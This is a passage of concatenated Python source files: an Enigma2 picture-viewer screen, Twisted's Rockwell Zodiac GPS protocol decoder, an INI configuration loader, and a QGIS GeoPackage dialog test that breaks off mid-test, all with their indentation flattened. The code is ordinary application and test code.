if self.maxentry < 0:
return
self.old_index = self.index
self.session.openWithCallback(self.callbackView, Pic_Full_View, self.filelist, self.index, self.path)
def callbackView(self, val=0):
self.index = val
if self.old_index != self.index:
self.paintFrame()
def Exit(self):
del self.picload
self.close(self.index + self.dirlistcount)
#---------------------------------------------------------------------------
class Pic_Full_View(Screen):
def __init__(self, session, filelist, index, path):
self.textcolor = config.pic.textcolor.value
self.bgcolor = config.pic.bgcolor.value
space = config.pic.framesize.value
self.size_w = size_w = getDesktop(0).size().width()
self.size_h = size_h = getDesktop(0).size().height()
if config.usage.pic_resolution.value and (size_w, size_h) != eval(config.usage.pic_resolution.value):
(size_w, size_h) = eval(config.usage.pic_resolution.value)
gMainDC.getInstance().setResolution(size_w, size_h)
getDesktop(0).resize(eSize(size_w, size_h))
self.skin = "<screen position=\"0,0\" size=\"" + str(size_w) + "," + str(size_h) + "\" flags=\"wfNoBorder\" > \
<eLabel position=\"0,0\" zPosition=\"0\" size=\""+ str(size_w) + "," + str(size_h) + "\" backgroundColor=\""+ self.bgcolor +"\" /><widget name=\"pic\" position=\"" + str(space) + "," + str(space) + "\" size=\"" + str(size_w-(space*2)) + "," + str(size_h-(space*2)) + "\" zPosition=\"1\" alphatest=\"on\" /> \
<widget name=\"point\" position=\""+ str(space+5) + "," + str(space+2) + "\" size=\"20,20\" zPosition=\"2\" pixmap=\"skin_default/icons/record.png\" alphatest=\"on\" /> \
<widget name=\"play_icon\" position=\""+ str(space+25) + "," + str(space+2) + "\" size=\"20,20\" zPosition=\"2\" pixmap=\"skin_default/icons/ico_mp_play.png\" alphatest=\"on\" /> \
<widget source=\"file\" render=\"Label\" position=\""+ str(space+45) + "," + str(space) + "\" size=\""+ str(size_w-(space*2)-50) + ",25\" font=\"Regular;20\" borderWidth=\"1\" borderColor=\"#000000\" halign=\"left\" foregroundColor=\"" + self.textcolor + "\" zPosition=\"2\" noWrap=\"1\" transparent=\"1\" /></screen>"
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions", "DirectionActions", "MovieSelectionActions"],
{
"cancel": self.Exit,
"green": self.PlayPause,
"yellow": self.PlayPause,
"blue": self.nextPic,
"red": self.prevPic,
"left": self.prevPic,
"right": self.nextPic,
"showEventInfo": self.StartExif,
"contextMenu": self.KeyMenu,
}, -1)
self["point"] = Pixmap()
self["pic"] = Pixmap()
self["play_icon"] = Pixmap()
self["file"] = StaticText(_("please wait, loading picture..."))
self.old_index = 0
self.filelist = []
self.lastindex = index
self.currPic = []
self.shownow = True
self.dirlistcount = 0
for x in filelist:
if len(filelist[0]) == 3: #orig. filelist
if x[0][1] == False:
self.filelist.append(path + x[0][0])
else:
self.dirlistcount += 1
elif len(filelist[0]) == 2: #scanlist
if x[0][1] == False:
self.filelist.append(x[0][0])
else:
self.dirlistcount += 1
else: # thumbnaillist
self.filelist.append(x[T_FULL])
self.maxentry = len(self.filelist)-1
self.index = index - self.dirlistcount
if self.index < 0:
self.index = 0
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.finish_decode)
self.slideTimer = eTimer()
self.slideTimer.callback.append(self.slidePic)
if self.maxentry >= 0:
self.onLayoutFinish.append(self.setPicloadConf)
def setPicloadConf(self):
self.setConf()
self["play_icon"].hide()
if config.pic.infoline.value == False:
self["file"].setText("")
self.start_decode()
def setConf(self, retval=None):
sc = getScale()
#setPara: 0=width 1=height 2/3=aspect scale 4=use_cache 5=resize_type 6=background(#AARRGGBB) 7=auto_orientation
self.picload.setPara([self["pic"].instance.size().width(), self["pic"].instance.size().height(), sc[0], sc[1], 0, int(config.pic.resize.value), self.bgcolor, config.pic.autoOrientation.value])
def ShowPicture(self):
if self.shownow and len(self.currPic):
self.shownow = False
if config.pic.infoline.value:
self["file"].setText(self.currPic[0])
else:
self["file"].setText("")
self.lastindex = self.currPic[1]
self["pic"].instance.setPixmap(self.currPic[2].__deref__())
self.currPic = []
self.next()
self.start_decode()
def finish_decode(self, picInfo=""):
self["point"].hide()
ptr = self.picload.getData()
if ptr != None:
text = ""
try:
text = picInfo.split('\n',1)
text = "(" + str(self.index+1) + "/" + str(self.maxentry+1) + ") " + text[0].split('/')[-1]
except:
pass
self.currPic = []
self.currPic.append(text)
self.currPic.append(self.index)
self.currPic.append(ptr)
self.ShowPicture()
def start_decode(self):
self.picload.startDecode(self.filelist[self.index])
self["point"].show()
def next(self):
self.index += 1
if self.index > self.maxentry:
self.index = 0
def prev(self):
self.index -= 1
if self.index < 0:
self.index = self.maxentry
def slidePic(self):
print "slide to next Picture index=" + str(self.lastindex)
if config.pic.loop.value==False and self.lastindex == self.maxentry:
self.PlayPause()
self.shownow = True
self.ShowPicture()
def PlayPause(self):
if self.slideTimer.isActive():
self.slideTimer.stop()
self["play_icon"].hide()
else:
self.slideTimer.start(config.pic.slidetime.value*1000)
self["play_icon"].show()
self.nextPic()
def prevPic(self):
self.currPic = []
self.index = self.lastindex
self.prev()
self.start_decode()
self.shownow = True
def nextPic(self):
self.shownow = True
self.ShowPicture()
def StartExif(self):
if self.maxentry < 0:
return
self.session.open(Pic_Exif, self.picload.getInfo(self.filelist[self.lastindex]))
def KeyMenu(self):
self.session.openWithCallback(self.setConf, Pic_Setup)
def Exit(self):
del self.picload
if config.usage.pic_resolution.value and (self.size_w, self.size_h) != eval(config.usage.pic_resolution.value):
gMainDC.getInstance().setResolution(self.size_w, self.size_h)
getDesktop(0).resize(eSize(self.size_w, self.size_h))
self.close(self.lastindex + self.dirlistcount)
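# A standalone sketch (hypothetical screen size; not part of the plugin) of the
# thumbnail-grid arithmetic used in Pic_Thumb.__init__ above: the screen is cut
# into (space + picture) cells and each cell gets an absolute top-left corner.
#
#   spaceX, picX, spaceY, picY = 35, 190, 30, 200   # skin defaults above
#   size_w, size_h = 1280, 720
#   thumbsX = size_w / (spaceX + picX)   # 5 columns (integer division)
#   thumbsY = size_h / (spaceY + picY)   # 3 rows
#   absX = spaceX + (posX * (spaceX + picX))
#   absY = spaceY + (posY * (spaceY + picY))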
|
pwarren/AGDeviceControl
|
refs/heads/master
|
agdevicecontrol/thirdparty/site-packages/linux2/twisted/protocols/gps/rockwell.py
|
3
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""Rockwell Semiconductor Zodiac Serial Protocol
Coded from official protocol specs (Order No. GPS-25, 09/24/1996, Revision 11)
Maintainer: U{Bob Ippolito<mailto:bob@redivi.com>}
The following Rockwell Zodiac messages are currently understood::
EARTHA\\r\\n (a hack to "turn on" a DeLorme Earthmate)
1000 (Geodesic Position Status Output)
1002 (Channel Summary)
1003 (Visible Satellites)
1011 (Receiver ID)
The following Rockwell Zodiac messages require implementation::
None really, the others aren't quite so useful and require bidirectional communication w/ the device
Other desired features::
- Compatibility with the DeLorme Tripmate and other devices with this chipset (?)
"""
import struct, operator, math, string
from twisted.internet import protocol
from twisted.python import log
DEBUG = 1
class ZodiacParseError(ValueError):
pass
class Zodiac(protocol.Protocol):
dispatch = {
# Output Messages (* means they get sent by the receiver by default periodically)
1000: 'fix', # *Geodesic Position Status Output
1001: 'ecef', # ECEF Position Status Output
1002: 'channels', # *Channel Summary
1003: 'satellites', # *Visible Satellites
1005: 'dgps', # Differential GPS Status
1007: 'channelmeas', # Channel Measurement
1011: 'id', # *Receiver ID
1012: 'usersettings', # User-Settings Output
1100: 'testresults', # Built-In Test Results
1102: 'meastimemark', # Measurement Time Mark
1108: 'utctimemark', # UTC Time Mark Pulse Output
1130: 'serial', # Serial Port Communication Parameters In Use
1135: 'eepromupdate', # EEPROM Update
1136: 'eepromstatus', # EEPROM Status
}
# these aren't used for anything yet, just sitting here for reference
messages = {
# Input Messages
'fix': 1200, # Geodesic Position and Velocity Initialization
'udatum': 1210, # User-Defined Datum Definition
'mdatum': 1211, # Map Datum Select
'smask': 1212, # Satellite Elevation Mask Control
'sselect': 1213, # Satellite Candidate Select
'dgpsc': 1214, # Differential GPS Control
'startc': 1216, # Cold Start Control
'svalid': 1217, # Solution Validity Control
'antenna': 1218, # Antenna Type Select
'altinput': 1219, # User-Entered Altitude Input
'appctl': 1220, # Application Platform Control
'navcfg': 1221, # Nav Configuration
'test': 1300, # Perform Built-In Test Command
'restart': 1303, # Restart Command
'serial': 1330, # Serial Port Communications Parameters
'msgctl': 1331, # Message Protocol Control
'dgpsd': 1351, # Raw DGPS RTCM SC-104 Data
}
MAX_LENGTH = 296
allow_earthmate_hack = 1
recvd = ""
def dataReceived(self, recd):
self.recvd = self.recvd + recd
while len(self.recvd) >= 10:
# hack for DeLorme EarthMate
if self.recvd[:8] == 'EARTHA\r\n':
if self.allow_earthmate_hack:
self.allow_earthmate_hack = 0
self.transport.write('EARTHA\r\n')
self.recvd = self.recvd[8:]
continue
if self.recvd[0:2] != '\xFF\x81':
if DEBUG:
raise ZodiacParseError('Invalid Sync %r' % self.recvd)
else:
raise ZodiacParseError
sync, msg_id, length, acknak, checksum = struct.unpack('<HHHHh', self.recvd[:10])
# verify checksum
cksum = -(reduce(operator.add, (sync, msg_id, length, acknak)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
raise ZodiacParseError('Invalid Header Checksum %r != %r %r' % (checksum, cksum, self.recvd[:8]))
else:
raise ZodiacParseError
# length was in words, now it's bytes
length = length * 2
# do we need more data ?
neededBytes = 10
if length:
neededBytes += length + 2
if len(self.recvd) < neededBytes:
break
if neededBytes > self.MAX_LENGTH:
raise ZodiacParseError("Invalid Header??")
# empty messages pass empty strings
message = ''
# does this message have data ?
if length:
message, checksum = self.recvd[10:10+length], struct.unpack('<h', self.recvd[10+length:neededBytes])[0]
cksum = 0x10000 - (reduce(operator.add, struct.unpack('<%dH' % (length/2), message)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
log.msg('msg_id = %r length = %r' % (msg_id, length))
raise ZodiacParseError('Invalid Data Checksum %r != %r %r' % (checksum, cksum, message))
else:
raise ZodiacParseError
# discard used buffer, dispatch message
self.recvd = self.recvd[neededBytes:]
self.receivedMessage(msg_id, message, acknak)
def receivedMessage(self, msg_id, message, acknak):
dispatch = self.dispatch.get(msg_id, None)
if not dispatch:
raise ZodiacParseError('Unknown msg_id = %r' % msg_id)
handler = getattr(self, 'handle_%s' % dispatch, None)
decoder = getattr(self, 'decode_%s' % dispatch, None)
if not (handler and decoder):
# missing handler or decoder
#if DEBUG:
# log.debug('MISSING HANDLER/DECODER PAIR FOR: %r' % (dispatch,))
return
decoded = decoder(message)
return handler(*decoded)
def decode_fix(self, message):
assert len(message) == 98, "Geodesic Position Status Output should be 55 words total (98 byte message)"
(ticks, msgseq, satseq, navstatus, navtype, nmeasure, polar, gpswk, gpses, gpsns, utcdy, utcmo, utcyr, utchr, utcmn, utcsc, utcns, latitude, longitude, height, geoidalsep, speed, course, magvar, climb, mapdatum, exhposerr, exvposerr, extimeerr, exphvelerr, clkbias, clkbiasdev, clkdrift, clkdriftdev) = struct.unpack('<LhhHHHHHLLHHHHHHLlllhLHhhHLLLHllll', message)
# there's a lot of shit in here..
# I'll just snag the important stuff and spit it out like my NMEA decoder
utc = (utchr * 3600.0) + (utcmn * 60.0) + utcsc + (float(utcns) * 0.000000001)
log.msg('utchr, utcmn, utcsc, utcns = ' + repr((utchr, utcmn, utcsc, utcns)))
latitude = float(latitude) * 0.00000180 / math.pi
longitude = float(longitude) * 0.00000180 / math.pi
posfix = not (navstatus & 0x001c)
satellites = nmeasure
hdop = float(exhposerr) * 0.01
altitude = float(height) * 0.01, 'M'
geoid = float(geoidalsep) * 0.01, 'M'
dgps = None
return (
# seconds since 00:00 UTC
utc,
# latitude (degrees)
latitude,
# longitude (degrees)
longitude,
# position fix status (invalid = False, valid = True)
posfix,
# number of satellites [measurements] used for fix 0 <= satellites <= 12
satellites,
# horizontal dilution of precision
hdop,
# (altitude according to WGS-84 ellipsoid, units (always 'M' for meters))
altitude,
# (geoid separation according to WGS-84 ellipsoid, units (always 'M' for meters))
geoid,
# None, for compatibility w/ NMEA code
dgps,
)
def decode_id(self, message):
assert len(message) == 106, "Receiver ID Message should be 59 words total (106 byte message)"
ticks, msgseq, channels, software_version, software_date, options_list, reserved = struct.unpack('<Lh20s20s20s20s20s', message)
channels, software_version, software_date, options_list = map(lambda s: s.split('\0')[0], (channels, software_version, software_date, options_list))
software_version = float(software_version)
channels = int(channels) # 0-12 .. but ALWAYS 12, so we ignore.
options_list = int(options_list[:4], 16) # only two bitflags, others are reserved
minimize_rom = (options_list & 0x01) > 0
minimize_ram = (options_list & 0x02) > 0
# (version info), (options info)
return ((software_version, software_date), (minimize_rom, minimize_ram))
def decode_channels(self, message):
assert len(message) == 90, "Channel Summary Message should be 51 words total (90 byte message)"
ticks, msgseq, satseq, gpswk, gpsws, gpsns = struct.unpack('<LhhHLL', message[:18])
channels = []
message = message[18:]
for i in range(12):
flags, prn, cno = struct.unpack('<HHH', message[6 * i:6 * (i + 1)])
# measurement used, ephemeris available, measurement valid, dgps corrections available
flags = (flags & 0x01, flags & 0x02, flags & 0x04, flags & 0x08)
channels.append((flags, prn, cno))
# ((flags, satellite PRN, C/No in dbHz)) for 12 channels
# satellite message sequence number
# gps week number, gps seconds in week (??), gps nanoseconds from Epoch
return (tuple(channels),) #, satseq, (gpswk, gpsws, gpsns))
def decode_satellites(self, message):
assert len(message) == 90, "Visible Satellites Message should be 51 words total (90 byte message)"
ticks, msgseq, gdop, pdop, hdop, vdop, tdop, numsatellites = struct.unpack('<LhhhhhhH', message[:18])
gdop, pdop, hdop, vdop, tdop = map(lambda n: float(n) * 0.01, (gdop, pdop, hdop, vdop, tdop))
satellites = []
message = message[18:]
for i in range(numsatellites):
prn, azi, elev = struct.unpack('<Hhh', message[6 * i:6 * (i + 1)])
azi, elev = map(lambda n: (float(n) * 0.0180 / math.pi), (azi, elev))
satellites.append((prn, azi, elev))
# ((PRN [0, 32], azimuth +-[0.0, 180.0] deg, elevation +-[0.0, 90.0] deg)) satellite info (0-12)
# (geometric, position, horizontal, vertical, time) dilution of precision
return (tuple(satellites), (gdop, pdop, hdop, vdop, tdop))
def decode_dgps(self, message):
assert len(message) == 38, "Differential GPS Status Message should be 25 words total (38 byte message)"
raise NotImplementedError
def decode_ecef(self, message):
assert len(message) == 96, "ECEF Position Status Output Message should be 54 words total (96 byte message)"
raise NotImplementedError
def decode_channelmeas(self, message):
assert len(message) == 296, "Channel Measurement Message should be 154 words total (296 byte message)"
raise NotImplementedError
def decode_usersettings(self, message):
assert len(message) == 32, "User-Settings Output Message should be 22 words total (32 byte message)"
raise NotImplementedError
def decode_testresults(self, message):
assert len(message) == 28, "Built-In Test Results Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_meastimemark(self, message):
assert len(message) == 494, "Measurement Time Mark Message should be 253 words total (494 byte message)"
raise NotImplementedError
def decode_utctimemark(self, message):
assert len(message) == 28, "UTC Time Mark Pulse Output Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_serial(self, message):
assert len(message) == 30, "Serial Port Communication Parameters In Use Message should be 21 words total (30 byte message)"
raise NotImplementedError
def decode_eepromupdate(self, message):
assert len(message) == 8, "EEPROM Update Message should be 10 words total (8 byte message)"
raise NotImplementedError
def decode_eepromstatus(self, message):
assert len(message) == 24, "EEPROM Status Message should be 18 words total (24 byte message)"
raise NotImplementedError
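# A minimal sketch (not part of the original protocol class) of the header
# checksum rule applied in dataReceived above: sum the four leading header
# words, keep the low 16 bits, negate, and wrap to a signed short.
def _zodiac_header_checksum(sync, msg_id, length, acknak):
    cksum = -(reduce(operator.add, (sync, msg_id, length, acknak)) & 0xFFFF)
    return struct.unpack('<h', struct.pack('<h', cksum))[0]
# e.g. _zodiac_header_checksum(0x81FF, 1000, 0, 0) reproduces the value that
# the parser compares against the fifth header word.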
|
karanisverma/feature_langpop
|
refs/heads/master
|
librarian/lib/confloader.py
|
2
|
"""
confloader.py: Application configuration loader
Copyright 2014-2015, Outernet Inc.
Some rights reserved.
This software is free software licensed under the terms of GPLv3. See COPYING
file that comes with the source code, or http://www.gnu.org/licenses/gpl.txt.
"""
import os
import re
try:
from configparser import RawConfigParser as ConfigParser
except ImportError:
from ConfigParser import RawConfigParser as ConfigParser
FLOAT_RE = re.compile(r'^\d+\.\d+$')
INT_RE = re.compile(r'^\d+$')
SIZE_RE = re.compile(r'^\d+(\.\d{1,3})? ?[KMG]B$', re.I)
FACTORS = {
'b': 1,
'k': 1024,
'm': 1024 * 1024,
'g': 1024 * 1024 * 1024,
}
def parse_size(size):
""" Parses size with B, K, M, or G suffix and returns in size bytes
:param size: human-readable size with suffix
:returns: size in bytes or 0 if source string is using invalid
notation
"""
size = size.lower()[:-1]
if size[-1] not in 'bkmg':
suffix = 'b'
else:
suffix = size[-1]
size = size[:-1]
try:
size = float(size)
except ValueError:
return 0
return size * FACTORS[suffix]
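# A few illustrative values (derived from FACTORS above; not part of the
# original module):
#   parse_size('10B')     -> 10.0
#   parse_size('1.5KB')   -> 1536.0
#   parse_size('12.3 MB') -> 12897484.8
#   parse_size('xyzGB')   -> 0   (unparseable number)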
class ConfigurationError(Exception):
""" Raised when application is not configured correctly """
pass
class ConfigurationFormatError(ConfigurationError):
""" Raised when configuration file is malformed """
def __init__(self, keyerr):
key = keyerr.args[0]
if '.' in key:
self.section, self.subsection = key.split('.')
else:
self.section = 'GLOBAL'
self.subsection = key
super(ConfigurationFormatError, self).__init__(
"Configuration error in section [{}]: missing '{}' setting".format(
self.section, self.subsection))
class ConfDict(dict):
def __getitem__(self, key):
try:
return super(ConfDict, self).__getitem__(key)
except KeyError as err:
raise ConfigurationFormatError(err)
@classmethod
def from_file(cls, path, skip_clean=False, base_dir='.', **defaults):
path = os.path.normpath(os.path.join(base_dir, path))
self = cls()
self.update(defaults)
parser = ConfigParser()
parser.read(path)
sections = parser.sections()
if not sections:
raise ConfigurationError(
"Missing or empty configuration file at '{}'".format(path))
children = []
defaults = []
for section in sections:
for key, value in parser.items(section):
if section not in ('DEFAULT', 'bottle'):
compound_key = '{}.{}'.format(section, key)
else:
compound_key = key
if not skip_clean:
value = self.clean_value(value)
if section == 'config' and key == 'defaults':
defaults = value
elif section == 'config' and key == 'include':
children = value
else:
self[compound_key] = value
incl_basedir = os.path.dirname(path)
for default in defaults:
self.setdefaults(cls.from_file(default, skip_clean=skip_clean,
base_dir=incl_basedir))
for child in children:
self.update(cls.from_file(child, skip_clean=skip_clean,
base_dir=incl_basedir))
return self
def setdefaults(self, other):
for k in other:
if k in self:
continue
self[k] = other[k]
@staticmethod
def clean_value(val):
""" Perform coercing of the values """
# True values: 'yes', 'Yes', 'true', 'True'
if val.lower() in ('yes', 'true'):
return True
# False values: 'no', 'No', 'false', 'False'
if val.lower() in ('no', 'false'):
return False
# Null values: 'null', 'NULL', 'none', 'None'
if val.lower() in ('null', 'none'):
return None
# Floating point numbers: 1.0, 12.443, 1002.3
if FLOAT_RE.match(val):
return float(val)
# Integer values: 1, 30, 445
if INT_RE.match(val):
return int(val)
# Data sizes: 10B, 12.3MB, 5.6 GB
if SIZE_RE.match(val):
return parse_size(val)
# Lists: one item per line, indented
if val.startswith('\n'):
return val[1:].split('\n')
# Multi-line string: same as python with triple-doublequotes
if val.startswith('"""'):
return val.strip('"""').strip()
# Everything else is returned as is
return val
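# Illustrative coercions performed by clean_value above (not part of the
# original module):
#   'yes'        -> True            'null' -> None
#   '1.5'        -> 1.5             '445'  -> 445
#   '10 MB'      -> 10485760.0      (via parse_size)
#   '\none\ntwo' -> ['one', 'two']  (indented list in the INI file)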
|
sbrunner/QGIS
|
refs/heads/master
|
tests/src/python/test_qgsnewgeopackagelayerdialog.py
|
19
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsNewGeoPackageLayerDialog
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Even Rouault'
__date__ = '2016-04-21'
__copyright__ = 'Copyright 2016, Even Rouault'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import tempfile
import shutil
from qgis.PyQt.QtCore import QCoreApplication, Qt
from qgis.PyQt.QtWidgets import QLineEdit, QDialogButtonBox, QTreeWidget, QComboBox, QToolButton
from qgis.PyQt.QtTest import QTest
from qgis.core import QgsProject, QgsSettings, QgsWkbTypes
from qgis.gui import QgsNewGeoPackageLayerDialog, QgsFileWidget
from qgis.testing import start_app, unittest
def GDAL_COMPUTE_VERSION(maj, min, rev):
return ((maj) * 1000000 + (min) * 10000 + (rev) * 100)
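# e.g. GDAL_COMPUTE_VERSION(1, 11, 0) == 1110000 and
# GDAL_COMPUTE_VERSION(2, 0, 0) == 2000000, matching the encoding of
# int(gdal.VersionInfo('VERSION_NUM')) used below.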
class TestPyQgsNewGeoPackageLayerDialog(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
QCoreApplication.setOrganizationName("QGIS_Test")
QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsNewGeoPackageLayerDialog.com")
QCoreApplication.setApplicationName("QGIS_TestPyQgsNewGeoPackageLayerDialog")
QgsSettings().clear()
start_app()
cls.basetestpath = tempfile.mkdtemp()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
QgsSettings().clear()
if cls.basetestpath is not None:
shutil.rmtree(cls.basetestpath, True)
def test(self):
# Skip if GDAL python bindings are not available
try:
from osgeo import gdal, ogr
except:
return
version_num = int(gdal.VersionInfo('VERSION_NUM'))
if version_num < GDAL_COMPUTE_VERSION(1, 11, 0):
return
dialog = QgsNewGeoPackageLayerDialog()
dialog.setProperty("hideDialogs", True)
mDatabase = dialog.findChild(QgsFileWidget, "mDatabase")
buttonBox = dialog.findChild(QDialogButtonBox, "buttonBox")
ok_button = buttonBox.button(QDialogButtonBox.Ok)
mTableNameEdit = dialog.findChild(QLineEdit, "mTableNameEdit")
mLayerIdentifierEdit = dialog.findChild(QLineEdit, "mLayerIdentifierEdit")
mLayerDescriptionEdit = dialog.findChild(QLineEdit, "mLayerDescriptionEdit")
mFeatureIdColumnEdit = dialog.findChild(QLineEdit, "mFeatureIdColumnEdit")
mGeometryTypeBox = dialog.findChild(QComboBox, "mGeometryTypeBox")
mGeometryColumnEdit = dialog.findChild(QLineEdit, "mGeometryColumnEdit")
mFieldNameEdit = dialog.findChild(QLineEdit, "mFieldNameEdit")
mFieldTypeBox = dialog.findChild(QComboBox, "mFieldTypeBox")
mFieldLengthEdit = dialog.findChild(QLineEdit, "mFieldLengthEdit")
mAddAttributeButton = dialog.findChild(QToolButton, "mAddAttributeButton")
mRemoveAttributeButton = dialog.findChild(QToolButton, "mRemoveAttributeButton")
mAttributeView = dialog.findChild(QTreeWidget, "mAttributeView")
dialog.accepted.connect(self.accepted_slot)
mGeometryTypeBox.setCurrentIndex(mGeometryTypeBox.findData(ogr.wkbPoint))
self.assertEqual(mGeometryTypeBox.currentText(), "Point")
self.assertFalse(ok_button.isEnabled())
dbname = os.path.join(self.basetestpath, 'test.gpkg')
mDatabase.setFilePath(dbname)
self.assertEqual(mTableNameEdit.text(), 'test')
self.assertEqual(mLayerIdentifierEdit.text(), 'test')
self.assertTrue(ok_button.isEnabled())
mGeometryColumnEdit.setText('my_geom')
mFeatureIdColumnEdit.setText('my_fid')
self.assertFalse(mAddAttributeButton.isEnabled())
self.assertFalse(mRemoveAttributeButton.isEnabled())
mFieldNameEdit.setText('strfield')
self.assertTrue(mAddAttributeButton.isEnabled())
mFieldLengthEdit.setText('10')
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('intfield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('integer'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('realfield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('real'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('datefield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('date'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
mFieldNameEdit.setText('datetimefield')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('datetime'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
mFieldNameEdit.setText('int64field')
mFieldTypeBox.setCurrentIndex(mFieldTypeBox.findData('integer64'))
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
# Add and remove field
mFieldNameEdit.setText('dummy')
self.assertFalse(mFieldLengthEdit.isEnabled())
QTest.mouseClick(mAddAttributeButton, Qt.LeftButton)
index = mAttributeView.model().index(mAttributeView.model().rowCount() - 1, 0)
mAttributeView.setCurrentIndex(index)
QTest.mouseClick(mRemoveAttributeButton, Qt.LeftButton)
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
self.assertTrue(self.accepted)
layers = QgsProject.instance().mapLayers()
self.assertEqual(len(layers), 1)
layer = layers[list(layers.keys())[0]]
self.assertEqual(layer.name(), 'test')
self.assertEqual(layer.geometryType(), QgsWkbTypes.PointGeometry)
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
lyr = ds.GetLayer(0)
self.assertEqual(lyr.GetFIDColumn(), 'my_fid')
self.assertEqual(lyr.GetGeometryColumn(), 'my_geom')
self.assertEqual(lyr.GetGeomType(), ogr.wkbPoint)
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 6)
else:
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 5)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(0).GetNameRef(), 'strfield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(0).GetType(), ogr.OFTString)
# Only GDAL 2.0 recognizes string field width
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(0).GetWidth(), 10)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(1).GetNameRef(), 'intfield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(1).GetType(), ogr.OFTInteger)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(1).GetWidth(), 0)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(2).GetNameRef(), 'realfield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(2).GetType(), ogr.OFTReal)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(2).GetWidth(), 0)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(3).GetNameRef(), 'datefield')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(3).GetType(), ogr.OFTDate)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(3).GetWidth(), 0)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetNameRef(), 'datetimefield')
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetType(), ogr.OFTDateTime)
else:
# There's a bug in OGR 1.11. The field is probably declared as DATETIME in SQL
# but OGR detects it as OFTDate
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetType(), ogr.OFTDate)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(4).GetWidth(), 0)
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(5).GetNameRef(), 'int64field')
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(5).GetType(), ogr.OFTInteger64)
self.assertEqual(lyr.GetLayerDefn().GetFieldDefn(5).GetWidth(), 0)
ds = None
# Try re-adding with different table. It should ask if we want to
# overwrite the DB, and we'll implicitly answer cancel, hence failure
mTableNameEdit.setText('table2')
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
self.assertFalse(self.accepted)
# Retry, and ask to keep the DB
self.accepted = False
dialog.setProperty('question_existing_db_answer_add_new_layer', True)
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_add_new_layer', None)
self.assertTrue(self.accepted)
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
self.assertEqual(ds.GetLayerCount(), 2)
ds = None
# Retry, and ask to overwrite the DB
self.accepted = False
dialog.setProperty('question_existing_db_answer_overwrite', True)
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_overwrite', None)
self.assertTrue(self.accepted)
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
self.assertEqual(ds.GetLayerCount(), 1)
ds = None
# Try re-adding with same parameters. It should ask if we want to
# overwrite the layer, and we'll implicitly answer no, hence failure
# since it already exists with that name
self.accepted = False
dialog.setProperty('question_existing_db_answer_add_new_layer', True)
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_add_new_layer', None)
self.assertFalse(self.accepted)
# Now answer yes, and change a few things
mLayerIdentifierEdit.setText('my_identifier')
mLayerDescriptionEdit.setText('my_description')
dialog.setProperty('question_existing_db_answer_add_new_layer', True)
dialog.setProperty('question_existing_layer_answer_overwrite', True)
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
dialog.setProperty('question_existing_db_answer_add_new_layer', None)
